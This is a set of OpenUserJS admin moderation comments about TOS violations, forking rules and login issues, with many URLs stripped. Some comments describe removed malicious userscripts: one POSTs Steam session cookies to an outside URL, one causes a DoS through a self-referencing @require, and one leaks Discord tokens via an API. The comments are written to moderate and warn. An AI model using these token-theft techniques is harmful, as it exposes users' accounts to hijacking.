Marti Admin

This is currently the earliest copy that can be found of this script.

If anyone decides to fork it... please use this scripts source page, make your changes, then click "Submit Code as Fork".

If anyone fails to do this the accounts associated are very eligible for removal... and some already have been.

Please abide by the TOS regarding this matter.

Thank you for your cooperation.

OUJS Admin.

Re: @Kevin_Kelly:

This is your only warning. Please do not violate the TOS with posting script source only in a comment and without a named code fence. Presuming the discussion topic is correct the highlighting language name code is tex otherwise if it is js use that.

Do it again and the TOS default action will be applied. Closing issue.

You also improperly forked this script. Please use the script source on this scripts source page and click "Submit Script as Fork" in the future. It has been corrected. Again this is your only warning.

OUJS Admin

Re: @birkett83:

Try it without the minification routines i.e.

// @require
// @require
// @require

Your version of Tampermonkey (TM) may be utilizing SRI and the jsdelivr server might not be well tweaked for that just yet or vice versa.

In any case TM issues is where you might get more in-depth answers for that .user.js engine.

Re: @GreenLunar:

"[Event Listener] Easy and efficient way to catch data generated upon event"

Is this discussion subject a statement or are you asking a question?

Assuming a question, based off what you said (some buzz words detected) of:

Yet, the following code is generated only on Event

... means one should probably be using a MutationObserver to detect changes in the DOM and probably attempting to run the .user.js as soon as possible with @run-at in the UserScript metadata block. How you parse the DOM fragments is up to you at that point.


Regarding your inquiry... you missed the window of opportunity especially with the original 1.0 deprecation announcement.

Read everything in this discussion and what it links to as well. Since you didn't leave me enough breadcrumbs to validate your old identity I can't merge you.

I would suggest on your new account that you mention something in your profile about your old one... although, again, nothing to validate the old account is actually yours.

OUJS Admin

You do realize I have enough to remove this script and yourself for Copyright infringement by not giving credit for this work.

Since this script is clearly a derivative of it you should have done that and because it is a lot of code I'm more inclined to give credibility that you may have inserted some custom code into here. You should @require that GH links source and then add whatever changes in this script.

Depending on how, and if you respond, to this I may have to take the default action for this.

OUJS Admin

Re: @theundeadwolf0:

Yes a lot of people do care and don't work on a TOS violation yourself as you may be removed if you continue this sort of behaviour.

Re: @Bogudan:

Granted. In the meantime to prevent spurious responses like @theundeadwolf0 please stick to flagging only.

OUJS Admin

You need to divulge transferring private information on the Script Info page to your custom API or else you'll be removed again.

OUJS Admin

Re: @WildLion:

... It's the only way. ...

... if possible

Not possible as I already mentioned. You are out of luck at this time.

OUJS Admin

Ask GH to rename you. It's the only way. Otherwise you get to create another OUJS account here and lose any stats.

OUJS Admin

Sending someones steam session cookie from off to is an odd action. Again all you had to do is explain it clearly and don't obfuscate via manual script injection.

Since you've violated the TOS multiple times... Bye.

OUJS Admin

Manual script injection and then POSTing to a managed URL at https://e.not-undo.xy with unannounced session stealing found.

All you had to do was describe what you were doing clearly. Instead you tried to obfuscate it. Not the brightest idea.

OUJS Admin

You might want to make this change:

--- /scripts/haibrvt/Hệ_Thống_Tự_Động_Roll_Free_BOT/source@8.0+09455a3
+++ /scripts/haibrvt/Hệ_Thống_Tự_Động_Roll_Free_BOT/source
@@ -8,7 +8,6 @@
 // @match*
 // @downloadURLệ_Thống_Tự_Động_Roll_Free_BOT.user.js
 // @updateURLệ_Thống_Tự_Động_Roll_Free_BOT.meta.js
-// @requireệ_Thống_Tự_Động_Roll_Free_BOT.user.js
 // @grant        none
 // @license MIT
 // @copyright 2021, haibrvt (

OUJS Admin

Attempting to cause a DoS by referencing another script on OUJS with this one is not a wise move and will lead to removal shortly.

OUJS Admin

Re: @cuzi:

Whoever created the facebook app would probably need to login on and see if there are any issues.

That would @sizzle . I don't control the publishing of the API keys i.e. I don't own the accounts. The only one I own is the test on dev for GitLab but that's not on production since @sizzle would need to be the owner of it.

Thanks for the tips. Hope he's watching. In the times I've been here I haven't seen anyone with FB logged in yet so I'm guessing there is probably an issue.



remove this, made this fork by mistake

If you wish to delete this, please do it yourself as the account author. On each script homepage there is a "Delete Script" in the "Danger Zone".

I will be clearing this flag as it is inappropriate use of the flagging system when you can delete it as the owner of the script while logged in. Since your flag isn't from this account it is also something that we can not do by proxy.

OUJS Admin

That dialog isn't anything that we generate and I don't think the dependency generates that either. So I'm not sure where that is coming from.

The only issue on that dependency that shows anything like this is at jaredhanson/passport-facebook#240. I'll leave a message there for that reporter (unfortunately they didn't say how they fixed it and not sure that person will respond) but we aren't in dev mode here... there would be a little "dev" next to OpenUserJS in the upper left corner if we were.

At some point I'll probably retry signing up for FB even though I have strong feelings against that site, etc. Last time I signed up for a test they started nagging me... ~"Are you still there", ~"We haven't seen you in a while", ~"We don't think you're there, you need to come here", ~"We're going to delete your account if you don't come here", etc. Has left a super bitter taste.

OUJS Admin

Re: @Anakunda:

... or where can I submit the bug report?

See the Development link at the bottom of every page on the site.

Can it be resolved...?

See #793. This is also tied in with not utilizing jQuery in #904 at some point. Most of the supported browsers (via TLS version compatibility) don't need it anymore and pure vanilla JavaScript can do it all.

OUJS Admin

Re: @Marti:
Correction... prepends it to their navigation bar... so at the start.

Hope you find it. :)


It currently appears to load a hidden menu item called Super Browse that is placed in something called the Super Browse Nav wherever that may be. It activates when you mouse over the tail end of that navigation bar and rehides when you leave it with the mouse. An example of a navigation bar here on OUJS is above on this page where it says "About Source Code Issues". That's a script navigation bar. The main navigation bar for OUJS is at the very top. So I assume Netflix has something similar. It may be horizontal like ours or vertical. Since I'm not on Netflix or there atm don't know for sure.

So move the mouse around and see where it appears. The script is a little dated (2016) so it may not work if the navigation bar it is attaching to no longer exists on the site or the DOM node it attaches to has been renamed.

Re: @quin!!:

tried to steal my discord account...

Let's see... with 0.1+b3eefc8:

  1. // @description itty bitty script to grab a yummy token from whoever installs it :yum:. I interpret this @description as:

    ~"itty bitty script to grab a yummy token from whoever (is inept enough to) install it :yum:".

Pretty clear that you probably shouldn't be using this script unless you want the next item to happen.

  1. The POST request to the sites API group is at And you may notice the crafting of the userToken which sends it off to this group as a description item. Most likely your userToken was published there for anyone with access to that group.

  2. Paying attention to item 2 it's in the clear atm and clearly labeled as what is can do for you. Personally, if I was on discord, I wouldn't be running this script. Also other discord scripts can access the localStorage items (and a cookie manipulation hook as well) this script creates so it's possible there may be other vectors.

  3. This script can show how their sites API can be manipulated into taking some private info and making it public. While I may not agree with the contents of the script, I find no deception, atm, with this version of the Userscript.

Long story short... good to let people know what you have experienced but now you know what not to do (installing something foreign) without first investigating it.

Please remember to give this a reread.

OUJS Admin